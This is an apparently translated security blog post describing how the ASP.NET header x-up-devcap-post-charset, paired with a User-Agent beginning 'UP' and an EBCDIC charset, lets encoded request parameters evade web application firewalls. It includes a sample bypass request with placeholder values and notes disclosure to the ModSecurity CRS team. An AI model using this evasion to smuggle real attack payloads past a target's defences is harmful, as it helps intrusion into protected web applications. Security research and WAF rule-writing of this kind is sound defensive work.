I've published several articles before that use coding technology to bypass WAF. In this article, I not only introduced the method of bypassing WAF, but also made it clear that WAF products can make the bypassing method invalid by intercepting a specific character set or only allowing charset in the white list to be used in content type.
Content-Type
charset
After a period of research, I found a request header x-up-devcap-post-charset in asp.net to wrap around WAF, which can be used to represent charset, so as to bypass the detection and protection mechanism of WAF for content type request headers.
x-up-devcap-post-charset
charset
Content-Type
Now let me officially introduce x-up-devcap-post-charset. The example is as follows:
x-up-devcap-post-charset
POST /test/a.aspx?%C8%85%93%93%96%E6%96%99%93%84= HTTP/1.1
Host: target
User-Agent: UP foobar
Content-Type: application/x-www-form-urlencoded
x-up-devcap-post-charset: ibm500
Content-Length: 40
%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7
As shown above, there is no charset in the content type request header, and x-up-devcap-post-charset indicates the character set used for encoding. In addition, to tell asp.net to pay attention to this new request header, the user agent value needs to start with up!
Content-Type
charset
x-up-devcap-post-charset
User-Agent
UP
The encoded parameters in the above request are automatically generated by burp suite http smugler. The original request is as follows:
POST /testme87/a.aspx?HelloWorld= HTTP/1.1
Host: target
User-Agent: UP foobar
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
input1=xxxxxxx
The reason why I found this special request header is that I found it when I was looking for something else in the framework code of asp.net. The following is a piece of code related to this request header in asp.net, which shows how asp.net reads content encoding before viewing charset in content type:
Content-Type
charset
https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362
as well as
https://github.com/Microsoft/referencesource/blob/08b84d13e81cfdbd769a557b368539aac6a9cb30/System.Web/HttpRequest.cs#L905
I think the code bypass technology I found should be applicable to most WAFS, because I don't think they take it seriously. Of course, OWASP ModSecurity core rule set (CRS) will soon create a special filter rule for it. Before I published this article, I showed the technical details to Christian folini (@ chrfolini) of CRS. The new rules will appear at https://github.com/spiderlabs/owasp-modsecurity-crs/pull/1392.
https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/1392
参考文献: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/request-encoding-to-bypass-web-application-firewalls/ https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour https://soroush.secproject.com/blog/2018/08/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour/ https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/ https://github.com/nccgroup/BurpSuiteHTTPSmuggler/ 感谢你的阅读!
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/